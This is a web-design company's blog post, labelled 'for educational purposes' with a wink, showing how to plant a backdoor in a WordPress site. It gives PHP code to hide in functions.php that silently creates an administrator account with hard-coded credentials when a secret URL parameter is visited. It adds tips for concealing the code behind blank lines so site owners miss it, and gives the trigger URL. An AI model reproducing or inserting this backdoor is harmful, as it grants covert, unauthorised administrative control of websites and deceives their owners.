Create a WordPress Admin Login from Front-End

FOR EDUCATIONAL PURPOSES ONLY

WordPress - Add an Administrator Login Via Backdoor Script 

FOR EDUCATIONAL PURPOSES ONLY!  This script may be illegal in certain countries.

YOU ASSUME ALL RISKS FOR MISUSE OF THIS SCRIPT. USE AT YOUR OWN RISK! 

For educational purposes ;-) I share with you the following easy-peasy WordPress backdoor admin login creation utility. Once the target website URL is accessed with the properly formatted and valid parameters, it will simply create a new admin user in the WordPress back-end. You’ll be able to login immediately using the secret login credentials which consist of a username and password. This method does not require an email address!

Step 1.
Determine what you want your username and password to be (obviously, you would want to make the login generic and the password strong)

Step 2.
Tweak the following code with your desired username and password. In the sample code below, the username is ‘wpadmin’. The password is ‘imbackbeeotch’. I strongly suggest changing these to the versions you identified in step 1.

Step 3.
Bury the following code somewhere in the functions.php file or another obscure php file that is loaded upon startup. Some WordPress builders disable the functions.php file (e.g., Oxygen Builder). Obviously, you’d need to bury the code elsewhere if using one of those builders.

TIP: If the functions.php has little or no code in it, just add a bunch of blank lines to the top of the file and then insert the backdoor code at the bottom of that. Most uneducated users will just see a blank file if they’ve even managed to make it that far.

Here is the simple code to insert (after completing step 2 above):

add_action('wp_head', 'wploop_backup');
function wploop_backup() {
If ($_GET['backd'] == 'wpadmin') {require('wp-includes/registration.php');
If (!username_exists('wpadmin')) {
$user_id = wp_create_user('wpadmin', 'imbackbeeotch');
$user = new WP_User($user_id);
$user->set_role('administrator'); } } }

Usage:
Navigate to this URL on the target website. Replace ‘wpadmin’ with your chosen password.
http://www.yourdomain.com/?backd=wpadmin

Result:
By simply accessing that URL, the script immediately creates an admin-level user with your defined login credentials from Step 1 and Step 2.

Don't hesitate to reach out to us via phone, email, contact form or social media. We monitor all channels and will do our best to get back to you within 24 hours or less.
Tel: 305-695-0708

© 1999-2022 iSatisfy.com
1750 Michigan Ave
Miami Beach, FL 33139

ABOUTTHE PROCESSTHE GUARANTEE

Serving South Florida: Miami-Dade, Broward, Palm Beach and Monroe Counties. Service area includes Miami, Miami Beach (South Beach), Ft. Lauderdale, West Palm Beach, Hollywood, Boca Raton, Key Largo and Key West.

linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram